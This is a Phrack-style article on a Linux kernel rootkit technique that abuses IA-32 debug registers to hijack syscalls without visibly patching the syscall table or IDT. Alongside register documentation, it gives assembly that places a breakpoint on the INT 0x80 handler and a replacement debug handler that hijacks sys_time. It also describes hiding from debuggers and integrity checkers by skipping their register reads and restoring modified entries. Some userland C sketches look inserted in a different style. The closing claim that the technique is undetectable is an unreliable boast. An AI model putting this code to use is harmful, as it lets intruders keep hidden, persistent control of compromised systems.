                             ==Phrack Inc.==

               Volume 0x0c, Issue 0x41, Phile #0x08 of 0x0f


|=---------------------=[ Mistifying the debugger, ]=--------------------=|
|=---------------------=[   ultimate stealthness   ]=--------------------=|
|=-----------------------------------------------------------------------=|
|=------------------------=[ halfdead@phear.org ]=-----------------------=|


--[ Introduction

Over the years, there has been a plethora of techniques and methods for
hiding one's presence on a hacked system. Many of them tampered directly
with the system call table, others modified the interrupt handler, while
others operated at the VFS layer. But all of them modified the underlying
operating system in a very visible manner, making them easy to detect.

In this article I will present a technique that is able to achieve ultimate
stealthness in kernel rootkits by using a common x86 feature, the
debugging mechanism. Although it works on any IA-32 compatible platform,
the technique will be detailed for the Linux operating system, and I
will show you how one can intercept the normal flow of execution without
touching the "classical" hooking targets. In fact, this technique can be
so good that no one will ever notice our presence.

When we refer to the "debugger" in this article, we actually mean the IA-32
debugging mechanism, which is directly accessible only from ring zero.
Userland debuggers cannot touch it directly and reach it, if at all, only
through the kernel; some kernel debuggers use it directly.


--[ The debugger

    "The IA-32 architecture provides extensive debugging
     facilities for use in debugging code and monitoring
     code execution and processor performance. These
     facilities are valuable for debugging applications
     software, system software, and multitasking operating
     systems."

In order to make life easier for developers, Intel introduced a mechanism
that was intended to manage the debugging process. This mechanism is
handled by a set of special registers (called debug registers, DR0..DR7)
which allow the user to set hardware breakpoints on memory addresses. As
soon as the execution flow hits an address marked with a breakpoint, the
processor hands control to the debug interrupt handler (INT 1), which
calls the do_debug() function (defined in ../i386/kernel/traps.c) to
take care of the actual situation that raised the exception.

The debugging support is accessed through the debug registers (DR0 through
DR7) and two model-specific registers (MSRs). For the purpose of this paper
we will only focus on the debug registers. These registers hold the
addresses of memory and I/O locations, called breakpoints. Breakpoints are
user-selected locations in a program, a data-storage area in memory, or
specific I/O ports where a programmer or system designer wishes to halt
execution of a program and examine the state of the processor by invoking
debugger software.

A debug exception (#DB) is generated when a memory or I/O access is made
to one of these breakpoint addresses. A breakpoint is specified for a
particular form of memory or I/O access, such as a memory read and/or
write operation or an I/O read and/or write operation. The debug registers
support both instruction breakpoints and data breakpoints. The MSRs (which
were introduced into the IA-32 architecture in the P6 family processors)
monitor branches, interrupts, and exceptions and record the addresses of
the last branch, interrupt or exception taken and the last branch taken
before an interrupt or exception.


--[ The debug registers

There are 8 debug registers supported by the Intel processors, which
control the debug operation of the processor. These registers can be
written to and read using the move to or from debug register form of
the MOV instruction. A debug register may be the source or destination
operand for one of these instructions. The debug registers are privileged
resources; a MOV instruction that accesses these registers can only be
executed in real-address mode, in SMM, or in protected mode at a CPL
of 0. An attempt to read or write the debug registers from any other
privilege level generates a general protection exception.

The primary function of the debug registers is to set up and monitor
from 1 to 4 breakpoints, numbered 0 through 3. The debug mechanism allows
us to manage the breakpoints through two special registers, DR6 and DR7,
which I will describe in detail later on. For each breakpoint, the
following information can be specified and/or detected with the debug
registers:

    - The linear address where the breakpoint is to occur.
    - The length of the breakpoint location (1, 2, or 4 bytes).
    - The operation that must be performed at the address for a debug
      exception to be generated.
    - Whether the breakpoint is enabled.
    - Whether the breakpoint condition was present when the debug
      exception was generated.

------[ Debug address registers

Each of the debug-address registers (DR0-DR3) holds the 32-bit linear
address of a breakpoint. Breakpoint comparisons are made before physical
address translation occurs.


------[ Debug registers DR4 and DR5

Debug registers DR4 and DR5 are reserved when debug extensions are enabled
(the DE flag in control register CR4 is set), and attempts to reference
these registers will raise an invalid-opcode exception. When the DE flag
is not set, these registers are aliased to DR6 and DR7.
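
The aliasing rule is easy to get backwards, so here is a minimal userland
sketch of it. It only models the rule stated above and touches no real
register; the function name resolve_debug_register() and the -1 return
convention for "invalid opcode" are assumptions made for illustration.

```c
#include <assert.h>
#include <stdbool.h>

/*
 * Hypothetical helper: given a debug register number n (0..7) and the
 * state of the DE flag in CR4, return the number of the register that
 * is really referenced, or -1 where the processor would raise an
 * invalid-opcode exception instead.
 */
int resolve_debug_register(int n, bool cr4_de)
{
    assert(n >= 0 && n <= 7);

    if (n == 4 || n == 5) {
        if (cr4_de)
            return -1;   /* DE set: DR4/DR5 are reserved */
        return n + 2;    /* DE clear: DR4 -> DR6, DR5 -> DR7 */
    }
    return n;            /* every other register refers to itself */
}
```

With DE clear, resolve_debug_register(4, false) yields 6 and
resolve_debug_register(5, false) yields 7; with DE set both yield -1.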


------[ Debug status register (DR6)

This special register is used to report the debug conditions that existed
at the time the last debug exception occurred. The flags in this register
show the following information:

    - B0..B3 (bits 0..3) indicate that a breakpoint condition was
      detected. These flags are set if the condition described
      for each breakpoint by the LENn and R/Wn flags in debug
      control register DR7 is true. They are set even if the
      breakpoint is not enabled by the Ln and Gn flags in register
      DR7.

    - BD (bit 13) (debug register access detected) indicates that the
      next instruction in the instruction stream will access one of the
      debug registers (DR0..DR7). This flag is enabled when the general
      detect (GD) flag in debug control register DR7 is set.

    - BS (bit 14) (single step) indicates (when set) that the debug
      exception was triggered by the single-step execution mode.

    - BT (bit 15) (task switch) indicates (when set) that the debug
      exception resulted from a task switch where the debug trap flag
      in the TSS of the target task was set.

Apart from B0..B3, which some debug exceptions may clear, the processor
never clears the contents of the DR6 register, so a debug handler has to
clear them itself before returning.
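
To make the bit layout concrete, here is a small sketch that classifies a
DR6 value using only the bit positions listed above. It works on a plain
integer and never reads the real register. The macro names, the enum and
the order in which the flags are tested are assumptions chosen for the
example, not something the architecture prescribes.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical names for the DR6 flags described in the text. */
#define DR6_B_MASK 0x0000000Fu   /* B0..B3, bits 0..3 */
#define DR6_BD     (1u << 13)    /* debug register access detected */
#define DR6_BS     (1u << 14)    /* single step */
#define DR6_BT     (1u << 15)    /* task switch */

enum dr6_cause {
    DR6_CAUSE_NONE,
    DR6_CAUSE_BREAKPOINT,
    DR6_CAUSE_REG_ACCESS,
    DR6_CAUSE_SINGLE_STEP,
    DR6_CAUSE_TASK_SWITCH
};

/* Returns nonzero if flag Bn (n = 0..3) is set in the given DR6 value. */
int dr6_breakpoint_hit(uint32_t dr6, int n)
{
    assert(n >= 0 && n <= 3);
    return (int)((dr6 >> n) & 1u);
}

/*
 * Reports one cause for a DR6 value. Several flags can be set at once;
 * this sketch simply reports the first match in the order BD, BS, BT,
 * B0..B3, which is an arbitrary choice.
 */
enum dr6_cause dr6_cause(uint32_t dr6)
{
    if (dr6 & DR6_BD)     return DR6_CAUSE_REG_ACCESS;
    if (dr6 & DR6_BS)     return DR6_CAUSE_SINGLE_STEP;
    if (dr6 & DR6_BT)     return DR6_CAUSE_TASK_SWITCH;
    if (dr6 & DR6_B_MASK) return DR6_CAUSE_BREAKPOINT;
    return DR6_CAUSE_NONE;
}
```

Since the processor leaves stale flags behind in DR6, a value decoded this
way is only meaningful if the previous handler cleared the register.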


------[ Debug control register (DR7)

The debug control register (DR7) enables or disables breakpoints and sets
breakpoint conditions. Its flags and fields control the following things:

    - L0..L3 (bits 0, 2, 4, 6) (local breakpoint enable) enable (when
      set) the breakpoint condition for the associated breakpoint for
      the current task. When a breakpoint condition is detected and its
      associated Ln flag is set, a debug exception is generated. The
      processor automatically clears these flags on every task switch
      to avoid unwanted breakpoint conditions in the new task.

    - G0..G3 (bits 1, 3, 5, 7) (global breakpoint enable) enable (when
      set) the breakpoint condition for the associated breakpoint for
      all tasks. When a breakpoint condition is detected and its
      associated Gn flag is set, a debug exception is generated.
      The processor does not clear these flags on a task switch,
      allowing a breakpoint to be enabled for all tasks.

    - LE and GE (bits 8 and 9) (local and global exact breakpoint
      enable) cause the processor to detect the exact instruction that
      caused a data breakpoint condition. Not supported in P6 family
      processors.

    - GD (bit 13) (general detect enable) enables (when set)
      debug-register protection, which causes a debug exception to be
      generated prior to any MOV instruction that accesses a debug
      register. When such a condition is detected, the BD flag in debug
      status register DR6 is set prior to generating the exception.

    - R/W0..R/W3 (bits 16, 17, 20, 21, 24, 25, 28, and 29) (read/write)
      specify the breakpoint condition for the corresponding breakpoint:
      00 breaks on instruction execution, 01 on data writes, 11 on data
      reads or writes, and 10 on I/O reads or writes (only when the DE
      flag in CR4 is set). For more information read the Intel manual.

    - LEN0..LEN3 (bits 18, 19, 22, 23, 26, 27, 30, and 31) (length)
      specify the size of the memory location at the address held in
      the corresponding debug address register: 00 for 1 byte, 01 for
      2 bytes and 11 for 4 bytes.
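
The DR7 layout is dense enough that a decoder helps when reading raw
values. The sketch below pulls the per-breakpoint fields out of a DR7
value passed in as a plain integer, using the bit positions listed above.
The struct and function names are hypothetical. The LEN encodings (00 = 1
byte, 01 = 2 bytes, 11 = 4 bytes, 10 undefined on IA-32) come from the
Intel manual.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical container for the DR7 fields of one breakpoint. */
struct dr7_breakpoint {
    int      local_enabled;   /* Ln flag */
    int      global_enabled;  /* Gn flag */
    unsigned rw;              /* raw two-bit R/Wn field */
    unsigned len_bytes;       /* 1, 2 or 4; 0 for the undefined encoding */
};

/* Decodes the fields that belong to breakpoint n (0..3). */
struct dr7_breakpoint dr7_decode(uint32_t dr7, int n)
{
    struct dr7_breakpoint bp;
    unsigned len;

    assert(n >= 0 && n <= 3);

    bp.local_enabled  = (int)((dr7 >> (2 * n)) & 1u);
    bp.global_enabled = (int)((dr7 >> (2 * n + 1)) & 1u);
    bp.rw             = (dr7 >> (16 + 4 * n)) & 3u;

    len = (dr7 >> (18 + 4 * n)) & 3u;
    bp.len_bytes = (len == 0) ? 1u : (len == 1) ? 2u : (len == 3) ? 4u : 0u;

    return bp;
}

/* Returns nonzero if the GD flag (bit 13) is set. */
int dr7_general_detect(uint32_t dr7)
{
    return (int)((dr7 >> 13) & 1u);
}
```

For example, dr7_decode(0x00500004, 1) describes breakpoint 1 as locally
enabled, with rw = 1 (data writes) and a length of 2 bytes, and
dr7_general_detect() reports GD as clear for the same value.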


--[ The magic

Ok, so we've learnt almost everything now about the IA-32 debugging
mechanism. Where are the goodies you promised?? Now we know a few
important things: we can set a breakpoint on a memory address and, as soon
as the execution flow hits our breakpoint, execution is redirected to the
debug handler (INT 1). Uhmm, so what if we replace the existing debug
handler or one of the underlying functions with our own? As we can see
from entry.S,

    ENTRY(debug)
            pushl $0
            pushl $ SYMBOL_NAME(do_debug)
            jmp error_code

the actual debug handler is a C function, do_debug(), defined in traps.c.
So we can either patch the INT 1 handler and then call do_debug() on our
own, OR we can come up with our own do_debug() and wait to be called by
the debug handler, so we rest assured that the IDT remains untouched. But
what should our handler handle? Most obviously, we need to check a few
parameters and then pass control to the actual operating system
do_debug(). But what parameters should we monitor? Keep reading...


------[ Hijacking the sys_call_table[]

Now you should have an idea how to hijack the syscall table by making use
of a breakpoint on read/write/execution of a targeted address in memory.
This can be either the INT 80 handler address or the syscall table
address; it matters little, as the effect is the same in the end. Each
time the operating system goes for a syscall, it will wind up in our
handler. We have two options here: A) hijacking the INT 80 handler, whose
address we read from the IDT, or B) hijacking the actual address of
sys_call_table[] in memory. Either of them fits our purposes, so we will
aim for A. The following function, called with the vector number in %eax,
returns the address of the INT 80 handler.

    get_idt_entry:
            sidt idtr                       # store limit and base of the IDT
            movl idtr+2, %ebx               # %ebx = IDT base address
            leal (%ebx, %eax, 8), %ebx      # 8-byte gate for vector %eax
            movw (%ebx), %cx                # handler offset, bits 0..15
            roll $16, %ecx
            movw 0x6(%ebx), %cx             # handler offset, bits 16..31
            roll $16, %ecx                  # put both halves in order
            movl %ecx, %eax                 # return the offset in %eax
            ret
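
For readers who find the rotate trick hard to follow, the same arithmetic
can be sketched in C on a raw copy of a gate descriptor. This is a
userland illustration of the descriptor layout only: an IA-32 gate is 8
bytes, with the low 16 bits of the handler offset in bytes 0..1 and the
high 16 bits in bytes 6..7. The function names gate_offset() and
gate_position() are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/*
 * Rebuilds the 32-bit handler offset from one raw 8-byte IA-32 gate
 * descriptor, given as little-endian bytes.
 */
uint32_t gate_offset(const uint8_t gate[8])
{
    uint32_t low  = (uint32_t)gate[0] | ((uint32_t)gate[1] << 8);
    uint32_t high = (uint32_t)gate[6] | ((uint32_t)gate[7] << 8);

    return (high << 16) | low;
}

/*
 * Linear address of the descriptor for a given vector: each gate is
 * 8 bytes wide, which is the scale factor in the leal instruction.
 */
uint32_t gate_position(uint32_t idt_base, unsigned vector)
{
    assert(vector < 256);
    return idt_base + 8u * vector;
}
```

With a made-up IDT base of 0xC0100000, the gate for vector 0x80 sits at
0xC0100400; the base value is only an example, not a real kernel address.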

Once we know the address, we can set up a breakpoint as follows:

    set_bpm:
            movl $0x80, %eax
            call get_idt_entry
            movl %eax, %dr0                 # DR0 = address of INT 80 handler
            xorl %eax, %eax
            orl $0x2080, %eax
            movl %eax, %dr7                 # load the control flags into DR7
            ret

As you can see, the set_bpm() function loads DR0 with the memory address
where the INT 80 handler is located and also sets up the corresponding
flags in DR7, including the magic GD bit, which lets us monitor WHO is
accessing the debug registers, and WHY. This bit is very important for us
because it "causes a debug exception to be generated prior to any MOV
instruction that accesses a debug register". Wow, do you mean...? Yeah, if
SOMEONE is trying to read/write the debug registers, control is passed to
our handler BEFORE the instruction takes place. So we know if someone, a
debugger or some tool of the devil, is checking the debug registers, even
before they know it. This gives us time to cover our tracks: we can undo
everything and wait some time for danger to pass, we can simply skip the
instructions affecting the debug registers, etc. The best thing to do is
to show the system clean debug registers and, after a short period of
time, hook everything back to best suit our needs. The best approach is to
come up with a code emulator that analyzes the type of the instruction
accessing the debug registers and, based on that, decides what action will
follow: clean the debug registers and restore them later, or simply
advance the instruction pointer so that the instruction is ignored.
Anyway, this leaves an open discussion.


------[ The handler

Now, we managed to redirect the flow of execution without patching anything
in the syscall table or INT 80 handler. But still, what should our handler
handle? For starters, in its most simplistic form, our handler needs to
check the value of the %eax register, because at this point it contains
the desired syscall number, and based on that it should feed the OS with
our hacked syscall. This is what a very simple handler looks like:

    asmlinkage void new_do_debug(struct pt_regs * regs, long error_code)
    {
        unsigned long condition;
        unsigned long mask = 0x2008;

        /* read the debug status register */
        __asm__ __volatile__("movl %%db6,%0" : "=r" (condition));

        if (condition & BD_FLAG) { /* someone is r/w the registers */
            condition &= ~BD_FLAG;
            __asm__ __volatile__ ("movl %0, %%db6" : : "r" (condition));
            regs->eip += 3;        /* skip the offending MOV */
            __asm__ __volatile__ ("movl %0, %%db7" : : "r" (mask));
        }

        if (condition & DR_TRAP0) { /* our breakpoint was hit */
            if (regs->eax == __NR_time)
                sys_call_table[__NR_time] = hacked_time;

            if (regs->eflags & VM_MASK) {
                (*old_do_debug)(regs,error_code);
                __asm__ __volatile__ ("movl %0, %%db7" : : "r" (mask));
            }

            condition &= ~DR_TRAP0;
            __asm__ __volatile__ ("movl %0, %%db6" : : "r" (condition));
            __asm__ __volatile__ ("movl %0, %%db7" : : "r" (mask));
            regs->eflags |= X86_EFLAGS_RF;
        }
        else
        {
            /* not ours: hand over to the original handler */
            (*old_do_debug)(regs, error_code);
            __asm__ __volatile__ ("movl %0, %%db7" : : "r" (mask));
        }

        return;
    }

What are we doing here? First, we grab the value of the status register
(DR6) and try to figure out what triggered our handler. If we were called
as a result of the breakpoint we placed, we compare the value in the
%eax register to the number of the syscall we decided to hijack, which was
sys_time() in our case. In the example provided, due to the lack of space
and time, we change sys_call_table[] directly, but this is not something
to worry about, as hacked_time() restores the original sys_call_table[]
entry the instant it gets executed:

    asmlinkage long hacked_time(int *tloc)
    {
        sys_call_table[__NR_time] = original_time;
        printk("<1>WE changed it!!\n");
        return original_time(tloc);
    }

Of course, there are other ways of doing it without touching the syscall
table at all, but take into consideration that the first thing
hacked_time() does is change back the value in sys_call_table[], meaning
that the actual change is in place for less than a microsecond, so it
shouldn't be a problem.

A better method would be to analyze the parameters of the syscall, based on
the syscall number, which at the time our handler runs is the value in the
%eax register. We could feed in the hacked parameters by simply filling the
corresponding registers. This method would create a "virtual" syscall
table, so we don't need to touch the actual syscall table at all.

So now we have learnt how to set a breakpoint on a memory address and how
to enable that breakpoint; we have also learnt that we can hijack the
normal execution flow without tampering with the INT 80 handler, the
syscall table handler or the syscall table itself. Yes, you can say it's a
lovely technique, a bit of magic. But still, we modify the INT 1 handler,
or at least we patch the do_debug() function, so we're not that stealthy.
Just keep reading...


--[ Blindfold

We learnt so many beautiful things by now: we take control of the system
and no one detects a direct tampering of the kernel. We covered our tracks
thanks to the GD/BD bits so, if someone is looking at the debugging
registers, we simply ignore their curiosity (regs->eip += 3). But what if
someone wants to check the whole IDT for integrity? Or what if a debugger
or a similar tool needs to place its own handler on INT 1? Are we lost
then?
It sure looks like it..

But wait.. DR6 and DR7 come to the rescue once more. What we need to do is
the following:

    - set up your handler on INT 1
    - set up the breakpoint to watch for INT 80 address
    - set a secondary breakpoint to watch on our handler's address

Oh, wait! It can't be that simple. Yes, it is! Like this, we practically
don't affect the kernel at all, as far as the unwanted eye can tell. In
our ideal handler, the code emulator checks the type of the instruction
that attempts to access the debug registers, and whether the exception
comes from the breakpoint we put on INT 80 or the one on INT 1, and acts
accordingly. We already explained what it should do for hijacking INT 80,
so let's talk now about INT 1. By placing a secondary breakpoint on INT 1
or the do_debug() function, we make sure that we know in advance when
someone attempts to read the only location in kernel memory we modified.
The best thing to do is to set that single address back to its original
value. Like this, when some devilish tool attempts to check for our
presence in the IDT too (I don't think there are any tools doing that out
there, but that's simply because a whitehat would never have thought it
necessary), we let them see the untouched value. This is "deep cover"
mode. But did we lose control over the kernel now? Well, not really, we're
still in control: we can "reinstall" our rootkit after a few nanoseconds,
so they miss us every time they look at us. It's like blindfolding them.
This technique is also helpful when dealing with a debugger (or similar
tool) trying to place its own hook in the INT 1 handler. Think about it:
we detect the attempt and put everything back to normal, they place their
hook, we hijack their hook as a normal INT 1 hijack and, as soon as they
check for their presence, for example by checking the presence of the
handler, we let them see themselves. It's like chaining hooks, or so. When
I discovered that, I was stunned. When I realised it really works, I was
amazed. This is the ultimate stealthness, the holy grail of hackers!


--[ Closing words

This technique has been actively used in the underground for more than 8
years now. The beauty of it: it is, in fact, a basic IA-32 feature. They
cannot defend against it without removing the whole debug mechanism. I
decided to make it public in phrack through a "scientific" paper *g* but it
wasn't my choice: the technique leaked a while ago. I highly doubt that the
person who leaked it knows exactly what his tool is actually capable of
and what it is actually doing, so I decided to help him and any other
hacker in the world willing to learn and improve their skills. As you have
seen, this is one very powerful technique, allowing one to achieve full
stealthness on a target system. Being a fundamental processor feature, it
can be used on ANY operating system running on IA-32 and also, there is no
way of detecting or protecting against it, even if it is not 0day
anymore ;(


--[ Kudos

halvar, twiz, reverser, sd and the rest of the digitalnerds